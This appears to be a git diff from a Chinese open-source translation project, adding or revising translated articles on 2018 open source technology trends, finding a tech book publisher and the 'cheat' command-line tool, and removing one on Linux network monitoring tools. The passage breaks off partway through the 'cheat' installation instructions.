![2018 年开源技术的 10 大发展趋势](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018")
|
||||
|
||||
图片来源:[Mitch Bennett][10]. [Opensource.com][31] 修改
|
||||
|
||||
科技一直在发展,诸如OpenStack,PWAs,Rust,R,认知云,人工智能(AI),物联网等一些新技术正在颠覆我们对世界的固有认知。以下是 2018 年最可能成为主流的开源技术纲要。
|
||||
|
||||
### 1\. OpenStack 认可度持续高涨
|
||||
|
||||
[OpenStack][12] 本质上是一个云操作平台(系统),它为管理员提供直观友好的控制面板,以便对大量的计算、存储和网络资源进行配置和监管。
|
||||
|
||||
目前,很多企业运用 OpenStack 平台搭建和管理云计算系统。得益于其灵活的生态系统、透明度和运行速度,OpenStack 越来越流行。相比其他替代方案,OpenStatic 只需更少的花费便能轻松支持任务关键型应用程序。
|
||||
但是,复杂的结构以及其对虚拟化、服务器、额外网络资源的严重依赖使得其它一些企业对使用 OpenStack 心存顾虑。另外,想要用好 OpenStack,好的硬件支持和高水平的员工二者缺一不可。
|
||||
|
||||
OpenStack 基金会一直在致力于完善他们的产品。不管发布与否的一些小的功能创新,都会解决 OpenStack 的潜在问题。随着其结构复杂性降低,OpenStack 将获取更大认可。加之众多大型软件开发和托管公司以及成千上万会员的支持, OpenStack 在云计算时代前途光明。
|
||||
|
||||
### 2\. PWA 或将大热
|
||||
|
||||
PWA,即 [增强型网页应用][13],是技术、设计和网络应用程序接口(web APIs)的集合,它能够在移动浏览器上提供类似应用程序的体验
|
||||
|
||||
传统的网页有许多与生俱来的缺点。虽然应用程序提供了一个比网页更加个性化、用户参与度更高的体验,但是却要占用大量的系统资源;并且要想使用应用,你还必须提前下载安装。PWA 则扬长避短,它为浏览器、可变引擎搜索框和其他一些操作作出响应,为用户提供应用程序般的体验。PWA 也能像应用程序一样自动更新显示最新的信息,基于网页的 HTTPS 模式又让其更加安全。PWA 运行于标准容器中,无须安装,只要输入 URL 即可。
|
||||
|
||||
现在的移动用户看重便利性和参与度,PWAs 的特性完美契合这一需求,所以 PWA 成为主流是必然趋势。
|
||||
|
||||
### 3\. Rust 成开发者新宠
|
||||
|
||||
大多数的编程语言都在安全性和控制二者之间折衷,[Rust][14] 是一个例外。Rust 使用广泛的编译时间检查进行 100% 的控制而不影响程序安全性。上一次 [Pwn2Own][15] 竞赛找出了 Firefox C++ 底层实现的许多严重漏洞。如果 Firefox 是用 Rust 编写的,这些漏洞在产品发布之前的编译阶段就会被发现并解决。
|
||||
|
||||
Rust 独特的内建单元测试方法使开发者们考虑将其作为首选开源语言。它是 C 和 Python 等其他编程语言有效的替代方案,Rust 可以在不丢失程序可读性的情况下写出安全的代码。总之,Rust 前途光明。
|
||||
|
||||
### 4\. R 用户群在壮大
|
||||
|
||||
[R][16] 编程语言,是一个与统计计算和图像呈现相关的 [*GUN* 项目][32]。它提供了大量的统计和图形技术,并且可扩展引导。它是 [S][17] 语言的延续。S 语言早已成为统计方法学的首选工具,R 为数据操作、计算和图形显示提供了开源选择。R 语言的另一个优势是对细节的把控和对细微差别的关注。
|
||||
|
||||
和 Rust 一样,R 语言也处于上升期。
|
||||
|
||||
### 5\. 广义的 XaaS
|
||||
|
||||
XaaS 是 ”一切都是服务“ 的缩写,是通过网络提供的各种线上服务的总称。XaaS 的外延正在扩大,软件服务(SaaS),基础设施服务(IaaS) 和平台服务(PaaS)等观念已深入人心,新兴的基于云的服务如网络服务(NaaS),存储服务(SaaS 或StaaS),监控服务(MaaS)以及通信服务(CaaS)等概念也正在普及。我们正在迈向一个 ”一切都是服务“ 的世界。
|
||||
|
||||
现在,XaaS 的概念已经延伸到实体企业。著名的例子有 Uber 、Lyft 和 Airbnb,前二者利用新科技提供交通服务,后者提供住宿服务。
|
||||
|
||||
高速网络和服务器虚拟化使得强大的计算能力成为可能,这加速了XaaS的发展,2018 年可能是 ”XaaS 年‘’。XaaS 无与伦比的灵活性、可扩展性将推动 XaaS 进一步发展。
|
||||
|
||||
### 6\. 容器技术越来越受欢迎
|
||||
|
||||
[容器技术][28],是用标准化方法打包代码的技术,它使得代码能够在任意环境中快速地 ”接入和运行“。容器技术使企业削减花费、更快运行程序。尽管容器技术在 IT 基础结构改革方面的潜力已经表现的很明显,事实上,运用好容器技术仍然是一个难题。
|
||||
|
||||
容器技术仍在发展中,技术复杂性随着各方面的进步在下降。最新的技术让容器使用起来像使用智能手机一样简单、直观,更不用说现在的企业需求:速度和灵活性往往能决定业务成败。
|
||||
|
||||
### 7\. 机器学习和人工智能的更广泛应用
|
||||
|
||||
[机器学习和人工智能][18] 指在没有程序员给出明确的编码指令的情况下,机器具备自主学习并且积累经验自我改进的能力。
|
||||
|
||||
随着一些开源技术利用机器学习和人工智能实现尖端服务和应用,这两项技术已经深入人心。
|
||||
|
||||
[Gartner][19] 预测,2018 年机器学习和人工智能的应用会更广。其他一些领域诸如数据准备、集成、算法选择、方法选择、模块制造等随着机器学习的加入将会取得很大进步。
|
||||
|
||||
全新的智能开源解决方案将改变人们和系统交互的方式,转变由来已久的工作观念。
|
||||
|
||||
* 机器交互,像[自助语音聊天程序][29]这样的对话平台,提供“问与答”的体验——用户提出问题,对话平台作出回应。
|
||||
* 无人驾驶和无人机现在已经家喻户晓了,2018年将会更司空见惯。
|
||||
* 沉浸式体验的应用不再仅仅局限于视频游戏,在真实的生活场景比如设计、培训和可视化过程中都能看到沉浸式体验的身影。
|
||||
|
||||
### 8. 数据区块链将成为主流
|
||||
|
||||
自比特币应用数据区块链技术以来,其已经取得了重大进展,并且已广泛应用在金融系统、保密选举、学历验证、等领域中。未来几年,区块链会在医疗、制造业、供应链物流、政府服务等领域中大展拳脚。
|
||||
|
||||
数据区块链分布式存储数据信息,这些数据信息依赖于数百万个共享数据库的节点。数据区块不被任意单一所有者控制,并且单个损坏的节点不影响其正常运行,数据区块链的这两个特性让它异常健康、透明、不可破坏。同时也规避了有人从中篡改数据的风险。数据区块链强大的先天优势足够支撑其成为将来主流技术。
|
||||
|
||||
### 9.认知云粉墨登场
|
||||
|
||||
认识技术,如前所述的机器学习和人工智能,用于为多行业提供简单化和个性化服务。一个典型例子是金融行业的游戏化应用,其为投资者提供严谨的投资建议,降低投资模块的复杂程度。数字信托平台使得金融机构的身份认证过程较以前精简80%,提升了协议遵守率,降低了诈骗率。
|
||||
|
||||
认知云技术现在正向云端迁移,借助云,它将更加强大。[IBM Watson][33] 是认知云应用最知名的例子。IBM 的 UIMA 架构是开源的,由 Apache 负责维护。DARPA(美国国防高级研究计划局) 的 DeepDive 项目借鉴 Watson 的机器学习能力,通过不断学习人类行为来增强决断能力。另一个开源平台 [OpenCog][34] ,为开发者和数据科学家开发人工智能应用程序提供支撑。
|
||||
|
||||
考虑到实现先进的、个性化的用户体验风险较高,这些认知云平台决定来年时机成熟,再粉墨登场。
|
||||
|
||||
### 10.物联网智联万物
|
||||
|
||||
物联网(IoT)的核心在于建立小到嵌入式传感器、大至计算机设备的相互连接,让其(“事物”)相互之间可以收发数据。毫无疑问,物联网将会是科技届的下一个 “搅局者”,但物联网本身处于一个不断变化的状态。
|
||||
|
||||
物联网最广为人知的产品就是 IBM 和三星合力打造的去中心化P2P自动遥测系统([ADEPT][20])。它运用和区块链类似的技术来构建一个去中心化的物联网。没有中央控制设备,”事物“ 之间通过自主交流来进行升级软件、处理bug、管理电源等等一系列操作。
|
||||
|
||||
### 开源推动技术创新
|
||||
|
||||
[数字中断][30]是当今以科技为中心的时代的常态。在技术领域,开放源代码正在逐渐普及,其在2018将年成为大多数科技创新的驱动力。
|
||||
|
||||
此榜单对开源技术趋势的预测有遗漏?在评论区告诉我们吧!
|
||||
|
||||
*文章标签:* [ `商业` ][25] [ `年鉴` ][26] [ `2017开源年鉴` ][27]
|
||||
|
||||
### 关于作者
|
||||
|
||||
![Sreejith Omanakuttan](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brain_2.jpg?itok=9PkPTyrV)
|
||||
|
||||
[**Sreejith Omanakuttan**][21] - 自 2000 年开始编程,2007年开始从事专业工作。目前在 [Fingent][6] 领导开源团队,工作内容涵盖不同的技术层面,从“无聊的工作”(?)到前沿科技。有一套 “构建—修复—推倒重来” 工作哲学。在领英上关注我:https://www.linkedin.com/in/futuregeek/
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
原文链接: https://opensource.com/article/17/11/10-open-source-technology-trends-2018
|
||||
|
||||
作者:[Sreejith ][a]
|
||||
译者:[wangy325](https://github.com/wangy25)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/sreejith
|
||||
[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ
|
||||
[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ
|
||||
[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I
|
||||
[6]:https://www.fingent.com/
|
||||
[7]:https://www.linkedin.com/in/futuregeek/
|
||||
[9]:https://opensource.com/user/185026/feed
|
||||
[10]:https://www.flickr.com/photos/mitchell3417/9206373620
|
||||
[11]:https://creativecommons.org/licenses/by-sa/4.0/
|
||||
[12]:https://www.openstack.org/
|
||||
[13]:https://developers.google.com/web/progressive-web-apps/
|
||||
[14]:https://www.rust-lang.org/
|
||||
[15]:https://en.wikipedia.org/wiki/Pwn2Own
|
||||
[16]:https://en.wikipedia.org/wiki/R_(programming_language)
|
||||
[17]:https://en.wikipedia.org/wiki/S_(programming_language)
|
||||
[18]:https://opensource.com/tags/artificial-intelligence
|
||||
[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/
|
||||
[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/
|
||||
[21]:https://opensource.com/users/sreejith
|
||||
[22]:https://opensource.com/users/sreejith
|
||||
[23]:https://opensource.com/users/sreejith
|
||||
[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments
|
||||
[25]:https://opensource.com/tags/business
|
||||
[26]:https://opensource.com/tags/yearbook
|
||||
[27]:https://opensource.com/yearbook/2017
|
||||
[28]:https://www.techopedia.com/2/31967/trends/open-source/container-technology-the-next-big-thing
|
||||
[29]:https://en.wikipedia.org/wiki/Chatbot
|
||||
[30]:https://cio-wiki.org/home/loc/home?page=digital-disruption
|
||||
[31]:https://opensource.com/
|
||||
[32]:https://en.wikipedia.org/wiki/GNU_Project
|
||||
[33]:https://en.wikipedia.org/wiki/Watson_(computer)
|
||||
[34]:https://en.wikipedia.org/wiki/OpenCog
|
@ -0,0 +1,74 @@
|
||||
如何为你的科技书籍找到出版商
|
||||
============================================================
|
||||
|
||||
> 想去写一本科技书籍是一个好的想法,但你还需要去了解一下出版业的运作过程。
|
||||
|
||||
![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book")
|
||||
|
||||
你有一个写本科技书籍的想法,那么祝贺你!就像徒步旅行,或者是去学做一种甜点心,写一本书就像人们说的那些事情一样,但是却都只停留在思考的初级阶段。那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你缺少如何完成它的足够信息。
|
||||
|
||||
如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是 [Pragmatci Bookshelf][4] 的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。
|
||||
|
||||
### 鉴别出你的目标
|
||||
|
||||
你的第一步是要找出最适合你的想法的出版商。你可以从你较喜欢购买的书籍的出版商开始,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的出版商开始将会大大缩小你的搜索范围。如果你自己所买的书籍并不多。你可以去书店逛逛,或者在亚马逊网站上看看。 列一个你自己喜欢的的出版商的清单出来
|
||||
|
||||
下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别,但他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如 C++ 或者 Java。你以 Elixir 为主题的书籍就可能不适合那个出版商。如果你的书是关于教授小孩学习编程的,你可能就不想让学术出版商来出版。
|
||||
|
||||
一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的书籍的主题一样或很相近的书,你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在该技术领域里的新方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。
|
||||
|
||||
如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。新的语言或者类库一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们的读者群体。他们的评估标准可能和你的是不一样的。唯一的途径是通过投稿来试探。
|
||||
|
||||
### 建立起你自己的网络
|
||||
|
||||
鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,出版业你认识的人却往往不是你所需要找的人。你需要认识的那个人是一个去发现新市场、新作者和新选题的组稿编辑。如果你认识某个和出版商有关系的人,请他帮你介绍认识一位组稿编辑。这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块的编辑通常会很乐意将你介绍给符合你的主题的编辑。
|
||||
|
||||
有时候你也许能够在一个技术论坛展会上找到一个组稿编辑,特别是出版商是赞助商,而且还有一个展台时。即使在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果论坛不符合你的主题思想,你需要利用你的社交网络来获得别人的推荐。使用 LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。
|
||||
|
||||
对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己的书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一。最坏的结果只不过是他们忽视你而已。
|
||||
|
||||
一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。
|
||||
|
||||
### 如果其它的方法都失败了
|
||||
|
||||
如果你无法找到一名组稿编辑,出版商通常会有一个<ruby>书稿盲投<rt>proposal alias</rt></ruby>的方式,通常是 `proposals@[publisher].com` 的格式。 查找他们网站的介绍找到如何去发送书稿;有的出版商是有特殊的要求的。遵循他们的要求,如果把你不这样做的话,你的书将会被丢弃,不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,你需要再尝试着去找一名组稿编辑进一步的沟通,因为书稿并不能回答那些问题。整理他们对你的要求(一篇独立的主题文章),发给他们,然后就去期望能够得到满意的答复。
|
||||
|
||||
### 然后就是……等待
|
||||
|
||||
无论你和一个出版商有着多么密切的联系,你也得等待着。如果你已经投递了书稿,也许要过一段时间才有人去处理你的稿件,特别是在一些大公司。即使你已经找了一位组稿编辑去处理你的投稿,你可能也只是他同时在处理的潜在目标之一,所以你可能不会很快得到答复。几乎所有的出版商都会在最终确认之前召开一次组委会来决定接受哪个稿件,所以即使你的书稿已经足够的优秀可以出版了,你也任然需要等待组委会的最后探讨。你可能需要等待几周的时间,甚至是一个月的时间。
|
||||
|
||||
几周过后,你可以和编辑联系一下看看他们是否需要更多的信息。在邮件中你要表现出足够的礼貌;如果他们仍然回复,也许是因为他们有太多的投稿需要处理,即使你不停的催促也不会让你的稿件被提前处理。一些出版商有可能永远不会回复你,也不会去发一份退稿的通知给你,但那种情况并不常见。在这种情况系你除了耐心的等待也没有别的办法,如果几个月后也没有人回复你邮件,你完全可以去接触另一个出版商或者干脆考虑自己来出版。
|
||||
|
||||
### 好运气
|
||||
|
||||
如果这个过程看起来让你感觉有些混乱和不科学,这是很正常的。能够得到出版要依靠合适的地方、合适的时间,和合适的人探讨,而且还要期待他们此时有好的心情。你无法去控制这些不确定的因素,但是对出版社运作过程的熟悉,了解出版商们的需求,能够帮助你做出一个自己能掌控的最佳选择。
|
||||
|
||||
寻找一个出版商只是万里长征的第一步。你需要提炼你的想法并创建提案,以及其他方面的考虑。在今年的 SeaGLS 上,我对整个过程的介绍指导有个[演讲][5]。去看看那个[视频][6]获得更多的细节信息。
|
||||
|
||||
### 关于作者
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7]
|
||||
|
||||
麦克唐纳先生现在是 Pragmatic Bookshelf 的主管编辑。在过去的 20 年里,在技术出版领域,他是一名编辑、一名作者、偶尔还去客串演讲者或者讲师。他现在把大量的时间都用来去和新作者探讨如何更好的表达出他们的想法。你可以关注他的推特@bmac_editor。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/how-find-publisher-your-book
|
||||
|
||||
作者:[Brian MacDonald][a]
|
||||
译者:[FelixYFZ](https://github.com/FelixYFZ)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/bmacdonald
|
||||
[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s
|
||||
[2]:https://opensource.com/users/bmacdonald
|
||||
[3]:https://opensource.com/user/190176/feed
|
||||
[4]:https://pragprog.com/
|
||||
[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[7]:https://opensource.com/users/bmacdonald
|
||||
[8]:https://opensource.com/users/bmacdonald
|
||||
[9]:https://opensource.com/users/bmacdonald
|
||||
[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments
|
@ -1,127 +0,0 @@
|
||||
Linux 中最佳的网络监视工具
|
||||
===============================
|
||||
|
||||
保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。对不同的系统操作,这是有几个网络监视工具。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。
|
||||
|
||||
### Iftop
|
||||
|
||||
[![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2]
|
||||
|
||||
与 Linux 用户经常使用的 Top 是非常类似的。这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。Iftop 与 Top 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。
|
||||
|
||||
我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Vnstat
|
||||
|
||||
[![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4]
|
||||
|
||||
**Vnstat** 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们在一个用户选择的时间周期内获取一个实时管理的发送和接收的流量。
|
||||
|
||||
我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Iptraf
|
||||
|
||||
[![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6]
|
||||
|
||||
**IPTraf** 是一个 Linux 的、基于控制台的、实时网络监视程序。(IP LAN) - 收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包和 Byne 报告。它也收集接口上全部的 TCP、UDP、…… 校验和错误、接口活动等等的详细情况。
|
||||
|
||||
我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Monitorix - 系统和网络监视
|
||||
|
||||
[![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8]
|
||||
|
||||
Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。一个 HTTP web 服务器可以被添加到它里面,定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均的系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot、等等)、MySQL 统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动、等等。
|
||||
|
||||
下载及更多 [信息在这里][9]。
|
||||
|
||||
### Dstat
|
||||
|
||||
[![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10]
|
||||
|
||||
这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。
|
||||
|
||||
我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Bwm-ng
|
||||
|
||||
[![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12]
|
||||
|
||||
这是最简化的工具中的一个。它允许你去从交互式连接中取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。
|
||||
|
||||
我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Ibmonitor
|
||||
|
||||
[![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14]
|
||||
|
||||
与上面的类似,它显示连接接口上过滤后的网络流量,并且,从接收到的流量中明确地区分区开发送流量。
|
||||
|
||||
我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Htop - Linux 进程跟踪
|
||||
|
||||
[![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16]
|
||||
|
||||
Htop 是一个更高级的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理接口、快捷键、水平和垂直的进程视图、等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。
|
||||
|
||||
我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Arpwatch - 以太网活动监视器
|
||||
|
||||
[![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19]
|
||||
|
||||
Arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析的程序。它持续监视以太网通讯并记录 IP 地址和 MAC 地址的变化。在一个网络中,它们的变化同时伴随记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。
|
||||
|
||||
我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Wireshark - 网络监视工具
|
||||
|
||||
[![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21]
|
||||
|
||||
**[Wireshark][1]** 是一个免费的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到通讯包中并查看每个包的内容 – 分开它们来满足你的特殊需要。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行是因为纪念那些年的荣誉。
|
||||
|
||||
最初它被认识是因为 Ethereal,Wireshark 有轻量化的、易于去理解的界面,它能分类显示来自不同的真实系统上的协议信息。
|
||||
|
||||
### 结论
|
||||
|
||||
在这篇文章中,我们看了几个开源的网络监视工具。由于我们从这些工具中挑选出来的认为是“最佳的”,并不意味着它们都是最适合你的需要的。例如,现在有很多的开源监视工具,比如,OpenNMS、Cacti、和 Zennos,并且,你需要去从你的个体情况考虑它们的每个工具的优势。
|
||||
|
||||
另外,还有不同的、更适合你的需要的不开源的工具。
|
||||
|
||||
你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux
|
||||
|
||||
作者:[LinuxAndUbuntu][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.linuxandubuntu.com
|
||||
[1]:https://www.wireshark.org/
|
||||
[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png
|
||||
[3]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png
|
||||
[5]:http://humdi.net/vnstat/
|
||||
[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif
|
||||
[7]:http://iptraf.seul.org/
|
||||
[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png
|
||||
[9]:http://www.monitorix.org
|
||||
[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png
|
||||
[11]:http://dag.wiee.rs/home-made/dstat/
|
||||
[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png
|
||||
[13]:http://sourceforge.net/projects/bwmng/
|
||||
[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg
|
||||
[15]:http://ibmonitor.sourceforge.net/
|
||||
[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png
|
||||
[17]:http://wesharethis.com/knowledgebase/htop-and-atop/
|
||||
[18]:http://hisham.hm/htop/
|
||||
[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png
|
||||
[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml
|
||||
[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg
|
||||
|
||||
|
@ -1,48 +1,37 @@
|
||||
translating---geekpi
|
||||
|
||||
Cheat – A Collection Of Practical Linux Command Examples
|
||||
Cheat - 一个实用 Linux 命令示例集合
|
||||
======
|
||||
Many of us very often checks **[Man Pages][1]** to know about command switches
|
||||
(options), it shows you the details about command syntax, description,
|
||||
details, and available switches but it doesn 't has any practical examples.
|
||||
Hence, we are face some trouble to form a exact command format which we need.
|
||||
我们中的许多人经常查看 **[ man 页面][1]** 来了解命令开关(选项),它会显示有关命令语法、说明、细节和可用的选项,但它没有任何实际的例子。因此,在组合成一个完整的我们需要的命令时会遇到一些麻烦。
|
||||
|
||||
Are you really facing the trouble on this and want a better solution? i would
|
||||
advise you to check about cheat utility.
|
||||
你确实遇到这个麻烦而想要一个更好的解决方案吗?我会建议你试一下 cheat。
|
||||
|
||||
#### What Is Cheat
|
||||
#### Cheat 是什么
|
||||
|
||||
[Cheat][2] allows you to create and view interactive cheatsheets on the
|
||||
command-line. It was designed to help remind *nix system administrators of
|
||||
options for commands that they use frequently, but not frequently enough to
|
||||
remember.
|
||||
[cheat][2] 允许你在命令行中创建和查看交互式 cheatsheet。它旨在帮助提醒 *nix 系统管理员
|
||||
他们经常使用但还没频繁到会记住的命令的选项。
|
||||
|
||||
#### How to Install Cheat
|
||||
#### 如何安装 Cheat
|
||||
|
||||
Cheat package was developed using python, so install pip package to install
|
||||
cheat on your system.
|
||||
cheat 是使用 python 开发的,所以用 pip 来在你的系统上安装 cheat。
|
||||
|
||||
For **`Debian/Ubuntu`** , use [apt-get command][3] or [apt command][4] to
|
||||
install pip.
|
||||
对于 **`Debian/Ubuntu`** 用户,请使用[ apt-get 命令][3]或[ apt 命令][4]来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo apt install python-pip python-setuptools
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo apt install python3-pip
|
||||
|
||||
```
|
||||
|
||||
pip doesn't shipped with **`RHEL/CentOS`** system official repository so,
|
||||
enable [EPEL Repository][5] and use [YUM command][6] to install pip.
|
||||
